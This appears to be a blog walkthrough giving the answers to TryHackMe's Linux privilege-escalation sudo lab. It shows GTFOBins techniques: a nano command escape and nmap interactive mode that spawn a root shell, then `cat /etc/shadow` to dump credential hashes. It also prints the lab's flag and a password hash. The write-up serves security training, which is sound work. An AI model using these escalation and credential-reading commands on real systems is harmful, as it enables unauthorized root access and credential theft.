This article discusses the solution for TryHackMe's Linux Privilege Escalation Kernel Sudo tasks so proceed with caution.
I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.
Privilege Escalation SUDO Solution
Notes:
A user may be given sudo privileges for specific applictions.
Can use these programs to execute sudo commands
Refer to GTFO BINS for reference.
Also check LD_PRELOAD exploit.
How many programs can the user "karen" run on the target system with sudo rights?
- Execute
sudo -l
Answer:3
What is the content of the flag2.txt file?
Let's go to https://gtfobins.github.io/#+sudo. Based on the previous question above we have a sudo exploit for nano. https://gtfobins.github.io/gtfobins/nano/#sudo
sudo nano
The inside the nano editor execute the following:
^R^X reset; sh 1>&0 2>&0
We will have a terminal with root access within nano.
Answer: THM-402028394
How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?
- Again go to https://gtfobins.github.io/#+sudo, and lookup nmap.
Answer: sudo nmap --interactive
What is the hash of frank's password?
- Execute the following command and look for frank's password hash. (still using the terminal inside nano).
cat /etc/shadow
Answer: $6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1
Until next time. Keep learning.
Stay stoked and code. :)
I hope you can voluntarily Buy Me A Coffee if you found this article useful and give additional support for me to continue sharing more content for the community. :)
Thank you very much. :)